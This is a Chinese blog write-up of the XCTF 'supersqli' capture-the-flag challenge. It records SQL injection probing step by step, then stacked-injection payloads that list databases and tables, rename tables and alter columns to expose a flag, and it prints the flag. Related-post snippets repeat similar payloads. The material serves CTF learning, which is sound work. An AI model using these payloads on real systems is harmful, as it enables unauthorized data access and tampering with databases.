堆叠注入-supersqli-XCTF

已于 2023-04-11 21:04:16 修改
阅读量181 收藏 1
点赞数
分类专栏: ctf题目 文章标签: web安全 数据库 安全漏洞
于 2022-07-09 16:34:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43660551/article/details/125628028
版权
本文详细记录了一次SQL注入的实战过程,从发现注入点到利用堆叠注入查询数据库,再到绕过关键字过滤,通过重命名表和修改字段名称,最终成功获取flag的过程。涉及的技术包括SQL注入技巧、数据库操作以及安全漏洞利用策略。
摘要由CSDN通过智能技术生成

启动靶机:只有个框,试试SQL注入,先提交1,有回显。

        提交1 and 1=11 and 1=2,发现没反应。输入1',发现报错,有注入。

        试试1' and '1'='1和1' and '1'='2,输入1' and '1'='2发现页面和1' and '1'='1不同。判断为单引号字符型注入。

        输入1' order by 1#1' order by 2#,回显正常。输入1' order by 3#,报错,故字段只有2个。

         按照正常的逻辑,接下来使用-1' union select database(),version()#来尝试判断可注入字段。结果回显显示过滤以下关键字。此路不通。。。

         尝试堆叠注入,查询数据库:1';show databases#

         查询所有的表:1';show tables;#

        发现两个表“1919810931114514”和“words”,都查一下。查一下表的列名:1';show columns from `1919810931114514`#,字符串1919810931114514作为表名进行操作要加反引号``。发现flag在这里。

查一下words表。1';show columns from words#

        由于提交的1时回显位一个数字和一个字符串,而表1919810931114514的列不是数字和字符串的形式。words表的列是数字和字符串,故请求的inject参数赋值给了words中的id参数了。但是flag却在表1919810931114514中。。。

        参考下大佬的做法,发现本题未禁用rename和alter,故将表1919810931114514重命名为words,将flag重命名为id,这样一来,inject的值被赋值给id(实际上是flag参数),就可以得到flag了。

        构造payload:1';rename tables `words` to `ws`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#

        此时inject参数变赋值给id(flag),利用万能密码试试:1' or 1=1#或者1' or '1'='1,得到flag:flag{c168d583ed0d4d7196967b28cbd0b5e9}。

发奋的鼹鼠
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Xctf练习sql注入--supersqli
weixin_45694388的博客
12-28 255
三种方法 方法一 =1 回显正常 =1’回显不正常,报sql语法错误 =1’ --+ 回显正常,说明有sql注入点,应该是字符型注入(# 不能用) =1’ order by 3 --+ 回显失败,说明有2个注入点 =1’ union select 1,2 --+ 回显显示过滤语句: =1’; show databases --+ 爆数据库名 =-1’; show tables --+ 绕过过滤,显示表下的列名 =1’;show columns from words --+ 尝试堆叠
XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
MJosek博客
03-23 1201
题目地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4686&page=1 我们进入页面 观察界面我们考虑到是sql注入 这里我们演示的是sqlmap的注入方法 首先我们页面的post请求进行抓包操作 ...
XCTF easysql注入writeup
小傅
07-16 657
我没有拿到flag,不过根据writeup的提示。。。还是没做出来。有朋友做出来了可以在下面评论。 官方提示如下 根据提示,我写了一个脚本,脚本代码如下,这个脚本可以在代码里修改用户名和密码,直接完成在网站上用户名和密码的创建和登录以及修改密码。 # -*-coding:utf-8-*- import requests #cookiesq全局变量不用改 url = "http://1...
XCTF Cat writeup
stepone4ward的博客
07-04 3532
刚看到题目的时候猜测是否是需要利用任意命令执行cat来读取文件的内容,后来才发现原来CAT是Cloud Automated Testing的缩写… 猜测1 测试输入127.0.0.1发现网站起到了检测目标站点网络是否连通(ping)的作用,我们都知道ping是一个php当中很危险的函数,可以利用|实现任意命令执行,测试payload:127.0.0.1|phpinfo();,得到返回为Inval...
XCTF高手进阶区】web5_supersqli writeup(新)
Mitchell_Donovan的博客
02-04 1128
web5_supersqli 原题链接 key:SQL堆叠注入 ①题目打开后是这个样子的???? 再根据题目描述???? 大概率是道SQL注入题 ②像bkctf里的那道SQL注入题一样 先把默认的inject=1提交一下 提交inject=1'回显错误,猜测是单引号闭合 提交inject=1'#回显正常,说明是单引号闭合 ③一样的操作,用order by判断联合注入的字段数 提交inject=1' order by 2#,回显正常 提交inject=1
XCTF-攻防世界CTF平台-Web类——7、NewsCenter(SQL注入
Onlyone_1314的博客
11-19 1737
目录标题手工注入information_schema.columns 学习sqlmap工具注入: 打开题目地址: 只有一个搜索框,下面是几条消息,上面输入关键词可以搜索这几条消息,可能就是存在SQL注入漏洞: 在后面加入’ or '1 = 1恒成立的判定条件: a ' or '1 = 1 搜索结果变成了所有的消息,应该就是存在SQL注入 手工注入 之后我们在后面拼接order by,来查看表中有多少列,查询结果按照前1列排序(第一个’闭合后台命令的第一个’,#注释掉后台的第二个’): ' order
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-NewsCenter(SQL注入解析)
weixin_44823018的博客
01-10 1088
这是一道关于SQL注入的题目。
CTF中SQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
mysql练习(一)
CloserSide的博客
09-13 389
mysql练习一、例子二、约束 一、例子 例1: create table a( name varchar(10) ); 例2: create table b( name varchar(10), height decimal(5,2) ); 例3:创建表c create table c( id int, name varchar(20), age tinyint UNSIGNED ); 例4:往表C中插入一条记录。 insert into c values (0,'王五'
XCTF-攻防世界CTF平台-Web类——14、supersqli(SQL注入、关键词过滤)
Onlyone_1314的博客
11-27 2008
目录标题方法一、堆叠注入1、rename修改表名和alter change修改列名2、rename修改表名和alter add添加列名方法二、handler语句方法三、预编译 打开题目地址 之后搜索:1’ or 1=1# 成功返回了3条数据,说明存在SQL注入漏洞 之后先判断有几列数据,使用order by 1让返回的数据按照第一列排序: 1' or 1=1 order by 1 # 返回了正确的结果,并且按照第一列排序了,说明至少存在一列数据。 其实我们也可以直接从order by 2让返回的数据
每天一道ctf
whisper921的博客
10-20 1371
ctf题
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1494
SQL注入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
xctf-supersqli
wh1sper、的博客
09-24 299
xctf-supersqli 堆叠注入一、堆叠注入 本次采用的靶场xctfsupersqli 一、堆叠注入 进入靶场,发现一个提示框。先随便点一下提交,发现输出了些东西·。 输入1’,判断存在注入点。 分别输如1=1,1=2,判断为单引号注入。 1' and 1= 1%23 1' and 1= 2%23 判断字段数,得到字段数为2。 1' order by 2%23 判断数据库,但发现使用了正则过滤了关键字select|update|delete|drop|insert|where
堆叠注入详解
爱上卿的博客
02-27 3424
0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在 mysql 中, 主要是命令行中,每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 0x01 堆叠注入原理 在SQL...
XCTF-supersqli
weixin_45613760的博客
08-06 270
XCTF-supersqli题目描述随便注打开链接,查看源码判断是否存在sql注入漏洞判断注入漏洞的类型数字型判断字符型判断获取列数尝试联合查询堆叠注入绕过过滤查询flag 题目描述随便注 打开链接,查看源码 看来没办法使用sqlmap了,采用手注⑧ 判断是否存在sql注入漏洞 最为经典的一种判断方法是单引号判断法 即在参数后面加上单引号,如下 http://220.249.52.133:53805/?inject=1' 如果页面返回错误,则存在sql注入 原因是字符型或者是整型都会因为单引号个数不
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值